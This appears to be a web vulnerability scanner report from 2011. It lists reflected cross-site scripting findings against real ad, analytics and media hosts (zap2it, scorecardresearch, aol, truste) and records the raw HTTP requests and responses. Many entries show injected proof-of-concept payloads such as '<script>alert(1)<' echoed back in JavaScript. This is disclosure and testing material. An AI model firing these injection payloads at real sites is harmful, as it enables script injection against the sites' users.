Confidence: | Certain |
Host: | http://api.zap2it.com |
Path: | /tvlistings/zcConnector |
GET /tvlistings/zcConnector Host: api.zap2it.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Cteonnt-Length: 483 Content-Length: 483 Cache-Control: max-age=900 Expires: Sat, 17 Sep 2011 16:38:39 GMT Date: Sat, 17 Sep 2011 16:23:39 GMT Connection: close Vary: Accept-Encoding var validRequest = true; var server = "http://api.zap2it.com"; var requestParams = "ap=ptg&v=2&aid=f3j&zip var action; action = "/tvlistings/ZCPrime if(requestParams!="" && validRequest) { document.write("<scr" + "ipt "); document.write("type= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.zap2it.com |
Path: | /tvlistings/zcConnector |
GET /tvlistings/zcConnector Host: api.zap2it.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Cteonnt-Length: 483 Content-Length: 483 Cache-Control: max-age=900 Expires: Sat, 17 Sep 2011 16:38:37 GMT Date: Sat, 17 Sep 2011 16:23:37 GMT Connection: close Vary: Accept-Encoding var validRequest = true; var server = "http://api.zap2it.com"; var requestParams = "ap=ptg&v=2ad912"-alert(1)- var action; action = "/tvlistings/ZCPrime if(requestParams!="" && validRequest) { document.write("<scr" + "ipt "); document.write( ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.zap2it.com |
Path: | /tvlistings/zcConnector |
GET /tvlistings/zcConnector Host: api.zap2it.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Cteonnt-Length: 483 Content-Length: 483 Cache-Control: max-age=900 Expires: Sat, 17 Sep 2011 16:38:38 GMT Date: Sat, 17 Sep 2011 16:23:38 GMT Connection: close Vary: Accept-Encoding var validRequest = true; var server = "http://api.zap2it.com"; var requestParams = "ap=ptg&v=2&aid=f3j&zip var action; action = "/tvlistings/ZCPrime if(requestParams!="" && validRequest) { document.write("<scr" + "ipt "); document.write("type= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=249914<script>alert(1)< Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 16:28:32 GMT Date: Sat, 17 Sep 2011 16:28:32 GMT Content-Length: 1240 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... E.purge=function(a){try COMSCORE.beacon({c1:"249914<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 16:54:19 GMT Date: Sat, 17 Sep 2011 16:54:19 GMT Content-Length: 1249 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... h-1;b>=0;b--){f=COMSCORE COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"16122", c5:"44988", c6:"", c10:"237868e4c54<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=7&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 16:36:32 GMT Date: Sat, 17 Sep 2011 16:36:32 GMT Content-Length: 1235 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... .length-1;b>=0;b--){f COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"8b174<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=3&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.donatemydress User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 16:34:58 GMT Date: Sat, 17 Sep 2011 16:34:58 GMT Content-Length: 1257 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... on(a){try{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"3", c2:"6036156bb21d<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=3&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.donatemydress User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 16:34:59 GMT Date: Sat, 17 Sep 2011 16:34:59 GMT Content-Length: 1257 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"3", c2:"6036156", c3:"583998898bb8<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=3&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.donatemydress User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 16:35:01 GMT Date: Sat, 17 Sep 2011 16:35:01 GMT Content-Length: 1257 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... comscore;for(b=a.length-1 COMSCORE.beacon({c1:"3", c2:"6036156", c3:"5839988", c4:"43836708fcab9<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=3&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.donatemydress User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 16:35:02 GMT Date: Sat, 17 Sep 2011 16:35:02 GMT Content-Length: 1257 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... a.length-1;b>=0;b--){f COMSCORE.beacon({c1:"3", c2:"6036156", c3:"5839988", c4:"43836708", c5:"70721135ad03d<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=3&c2 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.donatemydress User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 16:35:03 GMT Date: Sat, 17 Sep 2011 16:35:03 GMT Content-Length: 1257 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... h-1;b>=0;b--){f=COMSCORE COMSCORE.beacon({c1:"3", c2:"6036156", c3:"5839988", c4:"43836708", c5:"70721135", c6:"9597a<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://c.aol.com |
Path: | /read/_topic_stats |
GET /read/_topic_stats?ids= Host: c.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://nai.glb.adtechus Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:37:26 GMT Server: Apache-Coyote/1.1 Content-Type: application/json;charset Set-Cookie: gcp.dirty=true; Expires=Sat, 17-Sep-2011 17:42:26 GMT; Path=/ Content-Length: 203 jsonp1316296586533522e9<script>alert(1)< "status" : "OK", "http://nai.glb.adtechus "comments" : -1 } }); |
Severity: | High |
Confidence: | Certain |
Host: | http://choices.truste.com |
Path: | /ca |
GET /ca?pid=adexpose01&aid Host: choices.truste.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=165058976 |
HTTP/1.1 200 OK Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/javascript Date: Sat, 17 Sep 2011 16:40:07 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache Server: Apache-Coyote/1.1 Vary: Accept-Encoding Content-Length: 5492 Connection: keep-alive if(typeof truste=="undefined"|| truste.img=new Image(1,1);truste.ca ...[SNIP]... ivName:"te-clr1-04c957cd ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://choices.truste.com |
Path: | /ca |
GET /ca?pid=adexpose01&aid Host: choices.truste.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=165058976 |
HTTP/1.1 200 OK Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/javascript Date: Sat, 17 Sep 2011 16:39:54 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache Server: Apache-Coyote/1.1 Vary: Accept-Encoding Content-Length: 5574 Connection: keep-alive if(typeof truste=="undefined"|| truste.img=new Image(1,1);truste.ca ...[SNIP]... <a style="color:#456d88;text ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://choices.truste.com |
Path: | /ca |
GET /ca?pid=adexpose01&aid Host: choices.truste.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=165058976 |
HTTP/1.1 200 OK Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/javascript Date: Sat, 17 Sep 2011 16:41:02 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache Server: Apache-Coyote/1.1 Vary: Accept-Encoding Content-Length: 5492 Connection: keep-alive if(typeof truste=="undefined"|| truste.img=new Image(1,1);truste.ca ...[SNIP]... _clr1_960d0403_4ed5_48db ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cm.npc-hearst |
Path: | /js_1_0/ |
GET /js_1_0/?config Host: cm.npc-hearst.overture Proxy-Connection: keep-alive Referer: http://www.stamforda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BX=228g5ih765ieg&b=3&s=bh |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:23:16 GMT P3P: policyref="http://info Set-Cookie: UserData=02u3hs9yoaL Cache-Control: no-cache, private Pragma: no-cache Expires: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 3421 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <base target="_top"> <meta http-equiv="Content-Type" content="text/html; charset= ...[SNIP]... <link rel="stylesheet" href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ellegirl.elle.com |
Path: | / |